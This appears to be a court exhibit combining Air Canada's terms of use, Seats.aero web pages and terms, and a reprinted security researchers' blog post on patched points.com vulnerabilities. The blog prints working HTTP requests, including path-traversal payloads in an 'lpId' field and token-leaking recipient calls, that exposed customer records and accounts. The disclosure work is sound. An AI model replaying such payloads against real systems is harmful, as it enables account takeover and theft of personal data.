Air Canada also reserves the right to modify or discontinue, either temporarily or permanently, the Website including any products, goods or services contained on or referenced on our Website, with or without notice and without any liability.

| Linking | > |
| --- | --- |
| Representations and Warranties | > |
| Limitations of Use | > |
| Your Privacy | > |
| Liability Disclaimer | > |

## Changes

Air Canada reserves the right to change these Terms of Use at any time. We will notify you of any changes by posting an updated version of the Terms of Use on this Website. It is your responsibility to regularly review these Terms of Use. If you use the Website after we make any changes, it means you have accepted the changes and that you agree to be bound by the Terms of Use as modified.

Air Canada also reserves the right to modify or discontinue, either temporarily or permanently, the Website including any products, goods or services contained on or referenced on our Website, with or without notice and without any liability.



Linking ⟩

Representations and Warranties ⟩

**Limitations of Use** ⌄

You may not access or use the Website for any purpose that is unlawful or that is prohibited by these Terms of Use. You may only access or use the Website to determine the availability of and to purchase products, goods and services offered on the Website. Use of the Website for any other purpose, including any commercial use or purpose, is expressly prohibited.

In addition to the foregoing, you also agree that, in accessing or using the Website, you will not commit or participate in any of the following acts or actions, each of which is expressly prohibited under these Terms of Use:

- directly or indirectly, access, use, encourage, solicit, permit, facilitate, aid, assist, or abet or participate in, including, but not limited to, the selling, licensing, distribution or provision to any entity or person by any means whatsoever that allow, the access, use, or agree to provide the access or use, of the Website through any manual process or any automatic, electronic or technical device, including but not limited to automated scripts, robots, crawls, screen scrapers, web "bots", deep-links, indexes, spiders, click-spams, macro programs, or any other device, program, software, system, algorithm, methodology or technology, now known or that is afterwards discovered, that performs the same or a similar function, in order to, without limitation: "data mine"; "screen scrape"; data process; access, extract, copy, distribute, aggregate or acquire information; generate impressions or clicks; input or store information; search or generate searches; or manipulate or monitor any portion or content of the Website;

- unless expressly provided for in these Terms of Use, create any derivative works from or otherwise copy, license, display, publish, perform, recreate, reproduce, sell, transfer, transmit or otherwise distribute, modify, edit, add to, mirror, frame, re-render, truncate, inject, filer or change of the order of any information, products, goods, services, and software contained or offered on, or obtainable by, through or from the Website. Without limiting the generality of the foregoing, you also agree not to cause to appear any pop-up, pop-under, exit windows, expanding buttons, banners, advertisement, or anything else that minimizes, covers, or otherwise inhibits the full display of the Website;

EXHIBIT 7



automatically hide unreasonable mixed-cabin routings that are only partially in premium cabins.

and jump directly into the booking flow for certain mileage programs.

results are automatically summarized with OpenAI models to help you pick the best option.

update themselves with fresh data from the airline as you view it in Search and Explore.

## Join our newsletter

No spam, just updates and announcements on new Seats.aero features.

Email

**Subscribe**

By subscribing, you agree to our terms and conditions and privacy policy.

**Not affiliated with any airline.** Data is periodically refreshed and might not be up to date. 81c76bae





Seats.aero   Explore ▾   **Search**   Routes ▾   Guides ▾   Tools ▾   🛏 Hotels   **Create alerts ▾**          Log In 👤▾

# Discover the best flights for your points.

Seats.aero is the fastest search engine for award travel. Explore availability across entire regions, search with instant results, create free alerts and more to find the best flights for your points.

🌐 Explore ▾     🔍 Search

🎉 **New!** Explore the best hotels for your points with our new free companion site, Rooms.aero! → Explore Now



## Unlimited alerts 🔔

**No more repetitive searches.** Create alerts to be notified when the best seats are released. Customize your alerts based on operating airline, cost in points, and more.

🔔 Create alert



## Lightning fast ⚡

**No more waiting.** We're constantly checking flights with airlines in the background, which means you see your search results immediately. Search weeks at a time or between countries and regions.

🔍 Search



## Explore awards 🌐

**No more guessing.** Click on airport codes in our Explore tool to instantly see every award flight departing or arriving from any airport. Sort by business or first class and find the best options.

🌐 Explore

# Seats.aero is free, forever.

Search, explore availability, and create alerts for flights within the next two months for free — no registration required. When you're ready, a **PRO** account unlocks up to a year of availability on all routes, advanced filters, SMS alerts, and more. Only $9.99/month.

🛫 Go Pro



# System Status

Seats.aero relies on a variety of unofficial integrations with airline systems in order to retrieve availability data. For reasons usually out of our control, we may experience an outage for a particular airline.

Outages do not impact our Search or Explore tools, but they prevent any availability from being updated with fresh data. Below is a list of the mileage programs that Seats.aero supports and their current status.

| Mileage Program | Status |
| --- | --- |
| Aeromexico | Healthy |
| Air Canada Aeroplan | Healthy |
| Air France/KLM Flying Blue | Healthy |
| Alaska Mileage Plan | Healthy |
| American Airlines | Healthy |
| Delta SkyMiles | Healthy |
| Emirates Skywards | Healthy |
| Etihad Guest | Healthy |
| Qantas Frequent Flyer | Healthy |
| SAS EuroBonus | Healthy |
| United MileagePlus | Healthy |
| Virgin Atlantic | Healthy |
| Virgin Australia Velocity | Healthy |

☾ ⊙ 🐦 **Not affiliated with any airline.** Data is periodically refreshed and might not be up to date. 327d4e99

The Wayback Machine - https://web.archive.org/web/20231008190035/https://seats.aero/terms

 Seats.aero

# Terms and Conditions

Last updated: Sep 3rd, 2023

Please read these terms and conditions carefully before using Our Service.

# Interpretation and Definitions

## Interpretation

The words of which the initial letter is capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or in plural.

## Definitions

For the purposes of these Terms and Conditions:

- **Affiliate** means an entity that controls, is controlled by or is under common control with a party, where "control" means ownership of 50% or more of the shares, equity interest or other securities entitled to vote for election of directors or other managing authority.

- **Commercial Purpose** means any website, project, or other activity that generates or would be expected to generate revenue, and/or is affiliated with an entity that generates or would be expected to generate revenue

- **Country** refers to: California, United States

- **Company** (referred to as either "the Company", "We", "Us" or "Our" in this Agreement) refers to Localhost LLC, 9450 SW Gemini Dr, PMB 64097, Beaverton OR 97008.

- **Device** means any device that can access the Service such as a computer, a cellphone or a digital tablet.

- **Service** refers to the Website.

- **Terms and Conditions** (also referred as "Terms") mean these Terms and Conditions that form the entire agreement between You and the Company regarding the use of the Service.

- **Website** refers to Seats.aero, accessible from https://seats.aero

- **You** means the individual accessing or using the Service, or the company, or other legal entity on behalf of which such individual is accessing or using the Service, as applicable.

# Acknowledgment

These are the Terms and Conditions governing the use of this Service and the agreement that operates between You and the Company. These Terms and Conditions set out the rights and obligations of all users regarding the use of the Service.

Your access to and use of the Service is conditioned on Your acceptance of and compliance with these Terms and Conditions. These Terms and Conditions apply to all visitors, users and others who access or use the Service.

By accessing or using the Service You agree to be bound by these Terms and Conditions. If You disagree with any part of these Terms and Conditions then You may not access the Service.

You represent that you are over the age of 18. The Company does not permit those under 18 to use the Service.

# Links to Other Websites

Our Service may contain links to third-party web sites or services that are not owned or controlled by the Company. **The Company is not affiliated with any airlines or mileage programs.**

The Company has no control over, and assumes no responsibility for, the content, privacy policies, or practices of any third party web sites or services. You further acknowledge and agree that the Company shall not be responsible or liable, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any such content, goods or services available on or through any such web sites or services.

We strongly advise You to read the terms and conditions and privacy policies of any third-party web sites or services that You visit.

# Termination

We may terminate or suspend Your access immediately, without prior notice or liability, for any reason whatsoever, including without limitation if You breach these Terms and Conditions.

Upon termination, Your right to use the Service will cease immediately.

# Reliability of Data

The Service uses data periodically retrieved and then interpreted from various airlines or mileage programs. The Service only displays cached data, which may be outdated at the time of You viewing it. The Service may inadvertently misinterpret or omit availability.

You must not rely on the Service as your sole source of information before making a decison to transfer or purchase points, make travel bookings, or perform any other action. The Service also cannot prevent or detect "phantom" availability, which is availability that may not exist even if both the Service and the respective airline or mileage program claim it is available.

You must not depend on the Service's alerting features as your sole source of information. The alerting features may experience interruptions, downtime, or temporarily become unable to obtain new availability from certain airlines or mileage programs. The alerting features use the same data as the Website displays and are subject to the same potential issues with phantom availability.

# Usage of Data

In a non-automated fashion, You may access the Service for either non-commercial or a Commercial Purpose without cost (unless you choose to subscribe to a paid plan). You do not need permission to use the Service or Website in a non-automated fashion for a Commercial Purpose.

The Website also offers application programming interfaces (APIs), which are consumed in an automated fashion. You must not use the APIs or their associated data for a Commercial Purpose without the Company's written permission. For personal purposes that are not a Commercial Purpose, you may use the APIs without cost or explicit permission so

long as your use is not a Commercial Purpose and you attribute the data as required below.

All users of the application programming interfaces (APIs) must reasonably and visibly attribute any reproduced data to Seats.aero.

## Prohibited Uses

We do not permit resellers of frequent flyer points or miles (such as, but not limited to, "mileage brokers") to use the Service. We may prevent you from using the Service or terminate your account to the Service without any refund or prior notice if, in our sole discretion, we suspect that you are involved in being renumerated for the redemption or transfer of miles or points. We may also terminate your account if we suspect that you are violating or involved in violating the terms of an airline or mileage program, if we suspect you are abusing airlines or mileage program(s) in any other way we determine, or for any other reason permitted by these Terms.

## Personally-Identifiable Information (PII)

We will only use or share your personally-identifiable information (PII) to provide you this Service and to operate our Company as deemed reasonably necessary by the Company. For example, we may share your email address with an email delivery service to send you an alert.

In the normal use of our Website, we and our vendors may collect usage and product analytics (via Google Analytics and also via other solutions), and retain server logs to help troubleshoot and run the Service. We may send you product updates and other relevant news about the Service over email.

## Pro Subscription

If you choose to purchase it, Seats.aero offers a Pro subscription for $9.99 USD per month or $99.99 USD per year, processed and handled by Stripe. Pro subscription users are able to access certain features such as searching extended availability using the search tool, which is collected for up to 365 days in advance on supported routes. Alerts may also be created by Pro users to search extended availability. All Pro features are subject to change. The Company may grandfather existing users into older pricing structures at its discretion.

The Pro subscription may be cancelled at any time but is not refundable. Extended availability intrinsically updates much slower than the normal availability displayed for free on the site. Extended availability routes may change at any time. Pro features are delivered on a best-effort basis, and may experience interruptions as explained in Reliability of Data.

Pro subscriptions may be used for commercial use but may not be shared or used in an automated fashion. We may suspend or terminate accounts that violate this without any refund.

## Limitation of Liability

Notwithstanding any damages that You might incur, the entire liability of the Company and any of its suppliers under any provision of this Terms and Your exclusive remedy for all of the foregoing shall be limited to the amount actually paid by You through the Service or 100 USD if You haven't purchased anything through the Service.

To the maximum extent permitted by applicable law, in no event shall the Company or its suppliers be liable for any special, incidental, indirect, or consequential damages whatsoever (including, but not limited to, damages for loss of profits, loss of data or other information, for business interruption, for personal injury, loss of privacy arising out of or in any way related to the use of or inability to use the Service, third-party software and/or third-party hardware used with the Service, or otherwise in connection with any provision of this Terms), even if the Company or any supplier has been advised of the possibility of such damages and even if the remedy fails of its essential purpose.

Some states do not allow the exclusion of implied warranties or limitation of liability for incidental or consequential damages, which means that some of the above limitations may not apply. In these states, each party's liability will be limited to the greatest extent permitted by law.

## "AS IS" and "AS AVAILABLE" Disclaimer

The Service is provided to You "AS IS" and "AS AVAILABLE" and with all faults and defects without warranty of any kind. To the maximum extent permitted under applicable law, the Company, on its own behalf and on behalf of its Affiliates and its and their respective licensors and service providers, expressly disclaims all warranties, whether express, implied, statutory or otherwise, with respect to the Service, including all implied

warranties of merchantability, fitness for a particular purpose, title and non-infringement, and warranties that may arise out of course of dealing, course of performance, usage or trade practice. Without limitation to the foregoing, the Company provides no warranty or undertaking, and makes no representation of any kind that the Service will meet Your requirements, achieve any intended results, be compatible or work with any other software, applications, systems or services, operate without interruption, meet any performance or reliability standards or be error free or that any errors or defects can or will be corrected.

Without limiting the foregoing, neither the Company nor any of the company's provider makes any representation or warranty of any kind, express or implied: (i) as to the operation or availability of the Service, or the information, content, and materials or products included thereon; (ii) that the Service will be uninterrupted or error-free; (iii) as to the accuracy, reliability, or currency of any information or content provided through the Service; or (iv) that the Service, its servers, the content, or e-mails sent from or on behalf of the Company are free of viruses, scripts, trojan horses, worms, malware, timebombs or other harmful components.

Some jurisdictions do not allow the exclusion of certain types of warranties or limitations on applicable statutory rights of a consumer, so some or all of the above exclusions and limitations may not apply to You. But in such a case the exclusions and limitations set forth in this section shall be applied to the greatest extent enforceable under applicable law.

## Governing Law

The laws of the Country, excluding its conflicts of law rules, shall govern this Terms and Your use of the Service. Your use of the Application may also be subject to other local, state, national, or international laws.

## Disputes Resolution

If You have any concern or dispute about the Service, You agree to first try to resolve the dispute informally by contacting the Company.

## United States Legal Compliance

You represent and warrant that (i) You are not located in a country that is subject to the United States government embargo, or that has been

designated by the United States government as a "terrorist supporting" country, and (ii) You are not listed on any United States government list of prohibited or restricted parties.

# Severability and Waiver

## Severability

If any provision of these Terms is held to be unenforceable or invalid, such provision will be changed and interpreted to accomplish the objectives of such provision to the greatest extent possible under applicable law and the remaining provisions will continue in full force and effect.

## Waiver

Except as provided herein, the failure to exercise a right or to require performance of an obligation under these Terms shall not effect a party's ability to exercise such right or require such performance at any time thereafter nor shall the waiver of a breach constitute a waiver of any subsequent breach.

# Changes to These Terms and Conditions

We reserve the right, at Our sole discretion, to modify or replace these Terms at any time. If a revision is material We will make reasonable efforts to provide at least 30 days' notice prior to any new terms taking effect. What constitutes a material change will be determined at Our sole discretion.

By continuing to access or use Our Service after those revisions become effective, You agree to be bound by the revised terms. If You do not agree to the new terms, in whole or in part, please stop using the website and the Service.

# Contact Us

If you have any questions about these Terms and Conditions, You can contact us:

- By email: support@seats.aero

**Not affiliated with any airline.** Data is periodically refreshed and might not be up to date. d42b6cb7/sjc/sjc

EXHIBIT 8

## Sam Curry

Web Application Security Researcher

# Blog



# Leaked Secrets and Unlimited Miles: Hacking the Largest

Case 1:23-cv-01177-GBW Document 30-1 Filed 12/21/23 Page 40 of 75 PageID #: 761

# Airline and Hotel Rewards Platform

🕐 August 3, 2023   👤 samwcyo

## Introduction

Between March 2023 and May 2023, we identified multiple security vulnerabilities within points.com, the backend provider for a significant portion of airline and hotel rewards programs. These vulnerabilities would have enabled an attacker to access sensitive customer account information, including names, billing addresses, redacted credit card details, emails, phone numbers, and transaction records. Moreover, the attacker could exploit these vulnerabilities to perform actions such as transferring points from customer accounts and gaining unauthorized access to a global administrator website. This unauthorized access would grant the attacker full permissions to issue reward points, manage rewards programs, oversee customer accounts, and execute various administrative functions.

Upon reporting these vulnerabilities, the points.com team responded very quickly, acknowledging each report within an hour. They promptly took affected websites offline to conduct thorough investigations and subsequently patched all identified issues. All vulnerabilities reported in this blog post have since been remediated.



# Collaborators

- Ian Carroll (https://twitter.com/iangcarroll)
- Shubham Shah (https://twitter.com/infosec_au)
- Sam Curry (https://twitter.com/samwcyo)

# High Level Overview

The following is a high level overview of the reported vulnerabilities. For the technical write-ups, please scroll down to the "Investigating Points.com" section.

**Directory Traversal leads to Query Access to Points.com Customer Order Records (March 7, 2023)**

Our first report was an unauthenticated HTTP path traversal allowing access to an internal API which would've allowed an attacker to query entries from a set of 22 million order records. The data within the records included partial credit card numbers, home addresses, email addresses, phone numbers, reward points numbers, customer authorization tokens, and miscellaneous transaction details. This information could be queried through an API call that returned one-hundred results per HTTP request. By appending optional sorting parameters, an attacker could enumerate the data or query for specific information (e.g. searching a customer's name or email address).

**Ability to Transfer Rewards Points and Leak Customer Information using only Rewards Number and Surname (March 7, 2023)**

The second vulnerability we reported was an authorization bypass that would allow an attacker to transfer airline rewards points from other users by knowing only their surname and rewards points number (both of these fields were disclosed in our first vulnerability report) via an improperly configured API. An attacker could generate full account authorization tokens which would allow them to manage customer accounts, view order history, view billing information, view contact information, and transfer points from customers.

For both of the initial reports, the team responded in under 10 minutes and immediately took the websites offline. The issues were quickly fixed and the websites were back online shortly thereafter.

**Leaked Tenant Credentials for Virgin Rewards Program allows Attacker to Sign API Requests on Behalf of Virgin (Add/Remove Rewards Points, Access Customer Accounts, Modify Rewards Program Settings, etc.)**

On May 2nd, 2023, we discovered an endpoint on a points.com-hosted Virgin rewards website that leaked the "macID" and "macKey" used by Virgin to authenticate to the core points.com API on behalf of the airline. The credentials could be used to fully authenticate as the airline to the "lcp.points.com" API by signing HTTP requests using the disclosed secret, allowing an attacker to call any of the API calls intended for the airline like modifying customer accounts, adding/removing points, or modifying settings related to the Virgin rewards program.

The points.com team responded and fixed the issue within only an hour.

**New Method for Transferring Airline Miles and Accessing Customer Account and Order Information from United MileagePlus members (April 29th, 2023)**

On April 29th, 2023, we identified an additional fourth vulnerability affecting specifically United Airlines where an attacker could generate an authorization token for any user knowing only their rewards number and surname. Through this issue, an attacker could both transfer miles to themselves and authenticate as the member on multiple apps related to MileagePlus, potentially including the MileagePlus administrator panel. This issue disclosed the member's name, billing address, redacted credit card information, email, phone number, and past transactions on the account.

After reporting the issue, the team responded in under 10 minutes and immediately took the website offline. The issue was quickly fixed and the website was back online shortly thereafter.

### Full Access to Global Points.com Administration Console and Loyalty Wallet Administration Panel via Weak Flask Session Secret (May 2nd, 2023)

On May 2nd, 2023, we identified that the Flask session secret for the points.com global administration website used to manage all airline tenant and customer accounts was the word "secret". After discovering this vulnerability, we were able to resign our session cookies with full super administrator permissions.

After resigning the cookie with roles that give full administrator permissions, we observed that we could access all core administration functionality on the website, including user lookup, manual bonuses, rewards points conversion modifications (e.g. setting the exchange rate between two programs where 1 point would give you 1 million points), and many more points.com administrative endpoints (e.g. managing promotions, branding, resetting loyalty program credentials, etc.). An attacker could abuse this access to revoke existing reward program credentials and temporarily take down airline rewards functionality.

For our last vulnerability report, the team responded within an hour (even though we'd reported it at 3:30 AM CST) by taking the website offline and changing the secret.

# Investigating Points.com

With the cost of air travel becoming so expensive recently, I've gotten more and more into the "credit card churning" community where you can try to gamify credit cards and purchases to save rewards points which can be converted into things like flights and hotels. From a hacker's perspective, it's super interesting seeing a system that stores a numeric value that's essentially one-step from being used as an actual currency. The more and more I used these systems, the more interested I became in figuring out how they worked and what systems actually powered the rewards points industry.

I sent a message to Ian Carroll, someone who has a huge amount of experience hacking airlines who also runs an airline rewards booking website called seats.aero, expressing my interest in finding vulnerabilities in the rewards program infrastructure. After chatting for a while, we then pulled in Shubham Shah, another another hacker who has been hunting on airlines for years, and started a group chat with the goal of finding security vulnerabilities affecting the rewards points ecosystem.

When we began our research, we found that a company called points.com was the provider for nearly all major rewards programs globally. Every airline that I'd ever flown had used points.com as their backend for storing and processing reward points. They seemed to be the leader in the space, and they even had a security.txt page on their website.

## How does it all work?

After searching through Github and reading points.com documentation for a few hours, we found that there was an API built for rewards programs to use running on the "lcp.points.com" website. While looking through public repositories, we found a link to what looked like API documentation for the "lcp.points.com" API that had since been removed from the internet. Luckily for us, there was a copy of it available on archive.org.

The archived API documentation described ways in which reward programs could authenticate users, reward loyalty points, transfer loyalty points, spend loyalty points, and much more.



Our initial thought here was "how do we get access to use the API on behalf of a rewards program?", and after exploring a bit, we found the "console.points.com" website which allowed public registration for rewards programs to create skeleton accounts that had to be manually approved.



After authenticating to this portal, we observed that it was an administration console for the rewards programs where they could initialize and manage

OAuth-type apps. The apps were provisioned API keys that interacted with the "LCP API" (short for "Loyalty Commerce Platform") which was the "lcp.points.com" host.

The next thing we did was examine the JavaScript that powered the dashboard. We discovered that the website "console.points.com" appeared to be utilized by points.com employees for executing administrative actions concerning customer accounts, rewards programs, and managing components of the website itself.

The rewards program API used by rewards programs to manage points and customer accounts (lcp.points.com) required two keys to interact with it, both of which were distributed when you registered to the console.points.com website:

- macKeyIdentifier: essentially an OAuth client_id
- macKey: essentially an OAuth client_secret

Using the above two variables that we obtain by registering an app on "console.points.com", we were able to sign HTTP requests to the "lcp.points.com" host via the OAuth 2.0 MAC authentication scheme and call the loyalty platform API.



The fact that the platform employed this form of authorization was somewhat frustrating as it both meant we'd have to write a wrapper for signing HTTP requests to fuzz the API and that the secret key wouldn't be included in HTTP

requests sent by the rewards programs. If we found a vulnerability like SSRF on an airline program, for example, the key itself would not be leaked to us, only the signature for the specific HTTP request that the airline was trying to make.

We fuzzed the API for a long time (manually signing each HTTP request using a Python script) and failed to find any one-off authorization vulnerabilities. It was trivial to find the numeric IDs of other airline programs, but unfortunately we were unable to find any basic core API vulnerabilities like IDOR or privilege escalation. We decided to change routes to better understand how the publicly listed customer rewards programs were using the points.com infrastructure.

# Exploring the United Airlines Points Management Website

Since United Airlines was leveraging points.com for their rewards program, we thought it would be interesting to test one of their apps that was integrated with points.com. We found the following MileagePlus domain which was used to buy, transfer, and manage MileagePlus miles:



```
https://buymiles.mileageplus.com/united/united_landing_p
```

After fuzzing the site for a little while, we soon realized that the "buymiles.mileageplus.com" website was actually hosted by points.com and not United Airlines. We became super curious how the website worked from an authorization perspective and began to test the intended functionality of the site.



We continued using the "buymiles.mileageplus.com" website normally and observed the following flow after attempting to buy miles:

1. Click "Buy miles" on the "buymiles.mileageplus.com" website
2. Observe you are redirected to "www.united.com" where we authenticate to an OAuth-type flow using our United MileagePlus username and password
3. Observe you are redirected via the "redirect_uri" parameter to "buymiles.mileageplus.com" which then sends the following HTTP request using the authorization token obtained from authenticating with our username and password on "www.united.com":

**HTTP Request**

```
POST /mileage-plus/sessions/sso HTTP/2
Host: buymiles.mileageplus.com
Content-Type: application/json

{"mvUrl":"www_united_com_auth_token"}
```

**HTTP Response**

```
HTTP/2 201 Created
Content-type: application/json
```

```
{"memberValidation": "points_com_user_auth_token"}
```

4. Using the returned "memberValidation" token from the above HTTP response, send another HTTP request to the following endpoint where "memberDetails" is the returned "memberValidation" token:

**HTTP Request**

```
POST /payments/authentications/ HTTP/2
Host: buymiles.mileageplus.com
Content-Type: application/json

{"currency":"USD","memberDetails":"points_com_user_auth_token
```

**HTTP Response**

```
HTTP/201 Created
Content-type: application/json

{"email": "example@gmail.com", "firstName": "Samuel", "lastNa
```

After completing the OAuth-type flow, it appeared that the "memberValidation" token acted as a user authorization token for the points.com airline tenant whereby we could use this token repeatedly to perform API calls and authenticate as a user.

If we could generate this token for another user, we would be able to perform actions on their account like transferring airline miles and retrieving their personal information. This became one of our goals as we learned more about how the airline website was leveraging the points.com infrastructure, and something we explored further.

# (1) Improper Authorization on Points Recipient Endpoint Allows Attacker to Authenticate as Any User Using Only Surname and Rewards Number

As we continued to look for issues which would allow us to leak someone's "memberValidation" token, one flow we found on the United website titled "Buy miles for someone else".



When you landed on this page as an authenticated MileagePlus user, it would ask you to add a recipient to send miles to. The recipient input field took in a first name, last name, and a MileagePlus number. When we sent the HTTP request to add the recipient, we noticed something super interesting returned in the response:

**HTTP Request**

```
POST /mileage-plus/mvs/recipient HTTP/2
Host: buymiles.mileageplus.com
Content-Type: application/json
```

{"mvPayload":{"identifyingFactors":{"firstName":"Victim","lastNam

## HTTP Response

HTTP/2 201 Created
Content-type: application/json

{"memberId": "EH123456", "links": {"self": {"href": "points_com_u

The HTTP response contained the member's authorization token, something that we previously learned is used to retrieve their information and transfer miles on their behalf!

The vulnerability worked like this: by sending their first name, last name, and rewards number through the normal website UI for adding a points recipient, the server would return an authorization token in the HTTP response which could be used to retrieve their billing address, phone number, email, redacted credit card information, and billing history. We could additionally transfer miles on their behalf using this token.

To use the leaked token, we could simply take it and plug it into any of the API calls on the website and perform actions like transferring miles or simply retrieving the member's PII. We were able to fully authenticate into the victim account by only knowing their surname and rewards point number!



## Escalating the issue to affect other rewards programs

At this point, after discovering it was possible to access customer accounts knowing only their surname and rewards number, we were curious if there were other endpoints on the "buymiles.mileageplus.com" site that had similar permission issues but didn't require us to know any prerequisite information about the customer (our bug felt very lame at this time).

We noticed that there was a parameter present in the original vulnerable HTTP request for generating member authorization tokens called "lpId". According to the LCP API documentation, this parameter referred to the loyalty program UUID (e.g. Delta, United, Southwest, etc.). It appeared that the API on United's website was hitting the same API which other programs like Delta or Emirates used.

We were able to validate that we could exploit this vulnerability to access other rewards program customer accounts by swapping the loyalty program UUID and user rewards number to that of another program from our first vulnerability. If we swapped the loyalty UUID and rewards number to a Delta customer, it would return the authorization token a victim within the different rewards program.

Interestingly, this behavior also demonstrated that this was hitting a universal points.com API which seemed to be connected to all loyalty programs versus only United Airlines.



After escalating the issue to generating authorization tokens for any airline, we began to fuzz the vulnerable HTTP request and soon realized that the loyalty program UUID parameter was being sent as an HTTP path argument to a proxied HTTP server.

We discovered this by observing strange behavior when appending a question mark and pound symbol at the end of the loyalty program ID parameter, breaking the HTTP request being sent by the server:

**HTTP Request**

```
POST /mileage-plus-transfer/mvs/recipient HTTP/1.1
Host: buymiles.mileageplus.com

{"mvPayload":{},"lpId":"0ccbb8ee-5129-44dd-9f66-a79eb853da73#"} <
```

**HTTP Response**

12/20/23, 10:09 AM    Hacking Hotel, Hospital, and Hardware Hotel Clones: The Alarming Ease of Hacking the Points Loyalty Reward Platform

Case 1:23-cv-01177-GBW    Document 30    Filed 12/21/23    Page 54 of 75    PageID #: 775

```
HTTP/1.1 400 Bad Request
Content-type: application/json


{"error":"Cannot process type 'text/html', expected 'application/
```

Our immediate guess was that the "lpId" parameter was being sent to the "lcp.points.com" API and, after we appended the question mark, it would break the HTTP response so that the backend could not interpret the HTTP response from the second server. We sought to confirm that by guessing the directories before and after the loyalty program UUID and seeing if the API would still function normally.

After testing for a while, we validated that each of the following payloads would allow us to normally add a recipient, allowing us to validate that the HTTP request was in-fact proxied to a second HTTP server. We did this by reading the LCP API documentation and observing that many of the HTTP requests with loyalty program UUIDs had a previous directory of "lps" and an appended directory of "mvs". By sending these additional directories and receiving the normal 200 OK HTTP response, it meant that we were able to traverse on the API and could potentially hit other API endpoints.

```
"lpId":"/0ccbb8ee-5129-44dd-9f66-a79eb853da73"
"lpId":"/../lps/0ccbb8ee-5129-44dd-9f66-a79eb853da73"
"lpId":"0ccbb8ee-5129-44dd-9f66-a79eb853da73/mvs/?"
"lpId":"/../lps/0ccbb8ee-5129-44dd-9f66-a79eb853da73/mvs/?"
```

Based on our understanding of the LCP API OAuth 2.0 MAC authentication scheme, if these secondary context HTTP requests were directed towards the "lcp.points.com" host, they would need to be signed using the specific customers "macKey" and "macID" parameters.

The very strange and interesting thing, however, was that this HTTP request was able to generate authorization tokens for any rewards program. When we tried

to do that ourselves using our provisioned "lcp.points.com" credentials, we received authorization errors saying that we did not have permission to access the specific route.

The first thing that came to mind after seeing that the HTTP request could generate authorization tokens for any rewards program was that the points.com United website (which was built and hosted by points.com) was using a "god token" as an authorization bearer that had access to all rewards programs when sending the HTTP request to generate the points.com member authorization token.

If this were the case and we could traverse the API, then we would be able to rewrite entire POST request to any "lcp.points.com" endpoint that had global permissions. Our new interest became finding an endpoint to traverse to so that we could test whether or not the HTTP request was indeed being signed by a "god token."

# (2) Directory Traversal on Privileged API leads to Access of 22 Million Customer Order Records for Points.com Reward Programs

To test our theory that the secondary context API may be using an authorization token that had global permissions, we sought to find other endpoints that we could traverse to and overwrite the entire API call where we could control the entire HTTP request. After taking a list of endpoints from the LCP API documentation, we ran them through an intruder configuration which tested for the specific endpoint with an appended "?" to cut off the remaining path.

As an example, to try to find the right directory for "/api/example" we'd send the following "lpId" payloads:

```
"lpId":"/api/example?"

"lpId":"../api/example?"

"lpId":"../../api/example?"
```

Eventually, we had our first 200 OK HTTP response for the following payload:

**HTTP Request**

```
POST /mileage-plus-transfer/mvs/recipient HTTP/1.1
Host: buymiles.mileageplus.com

{"mvPayload":{},"lpId":"../../v1/search/orders/?"}
```

**HTTP Response**

```
HTTP/2 400 Bad Request
Content-type: application/json

{"error":"Missing query parameter"}
```

After seeing the missing query parameter, we attempted to fuzz the GET parameters via the "lpId" parameter by appending them (e.g. /v1/search/orders? query=x) but weren't able to identify anything. This puzzled us for a bit, then we realized that the "/v1/search/orders" endpoint was a POST request that took a JSON body.

We saw the empty parameter "mvPayload" that we were sending and attempted to fuzz for parameters within the JSON body. Our intruder script ran, and then we saw one that was successful with a huge response size! It appeared the parameter "q" was the parameter the server was looking for.

By sending the following POST request, we were able to access the transaction data for all points.com loyalty programs including Delta, Emirates, Singapore

Airlines, United, Etihad, Air Canada, Lufthansa, Southwest, Alaska, Hawaiian, and additionally many hotel reward points providers like Hilton, Marriott, and IHG:

## HTTP Request

```
POST /mileage-plus-transfer/mvs/recipient HTTP/1.1
Host: buymiles.mileageplus.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) G
Content-Type: application/json
Content-Length: 59
Connection: close

{"mvPayload":{"q":"*"},"lpId":"../../v1/search/orders/?"}
```

## HTTP Response

```
HTTP/1.1 200 OK
Date: Fri, 10 Mar 2023 00:02:04 GMT
Content-Type: application/json

{
  "orders": [
    {
      "payment": {
        "billingInfo": {
        "cardName": "Visa",
        "cardNumber": "XXXXXXXXXXXXXXXX",
        "cardType": "VISA",
        "city": "REDACTED",
        "country": "US",
        "expirationMonth": 7,
        "expirationYear": 2023,
        "firstName": "REDACTED",
        "lastName": "REDACTED",
        "phone": "REDACTED",
        "state": "TX",
        "street1": "REDACTED",
```

12/20/23, 10:59 AM                    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

Case 1:23-cv-01177-GBW  Document 30-1  Filed 12/21/23  Page 58 of 75  PageID #: 779

```
            "zip": "REDACTED"
          },
          "costs": {
            "baseCost": 275,
            "fees": [],
            "taxes": [],
            "totalCost": 275
          },
          "currency": "USD",
          "type": "creditCard"
        },
        "user": {
          "balance": 94316,
          "email": "REDACTED",
          "firstName": "REDACTED",
          "lastName": "REDACTED",
          "memberId": "REDACTED",
          "memberValidation": "https://lcp.points.com/v1/lps/LOYALTY_
          "membershipLevel": "1"
        },
        "flightBookingDetails": {
          "destinationCode": "MDW",
          "destinationName": "Chicago (Midway), IL - MDW",
          "originCode": "SDF",
          "originName": "Louisville, KY - SDF",
          "roundTrip": true
        }
      }
    ],
    "totalCount": "22745869"
  }
```

Once we saw the HTTP response, we immediately reported the issue. There were over 22 million records that we could query from various airlines and hotel rewards programs. It appeared that the "macKey" and "macID" signing the HTTP request was a sort of "god key" which had access to all rewards program data.

This vulnerability affected all nearly all points.com customers.

## Points.com Catches Us

Before we could even finish sending our report or see if other endpoints were accessible (e.g. adding points to a customer rewards account), the points.com team had detected our testing and had completely shut down United's production points.com website. Bummer! If we were malicious actors, we would've gotten caught trying to enumerate any significant number of records (the query returned 100 records per/request) via the exploit. The detection and response by the points.com team was seriously impressive.

After having tested the points.com infrastructure for a few days, we became increasingly interested in finding a vulnerability that would allow us to duplicate or generate unlimited miles. While the "buymiles.mileageplus.com" website was down, we began exploring the rest of the points.com infrastructure.

# (3) Leaked Credentials for Virgin Rewards Program allows Attacker to Sign API Requests on Behalf of Virgin, Add/Remove Rewards Points, Access Customer Accounts

Amidst our testing on points.com assets, we discovered a website used by Virgin rewards customers to earn points when shopping on partner websites at "shopsaway.virginatlantic.com".

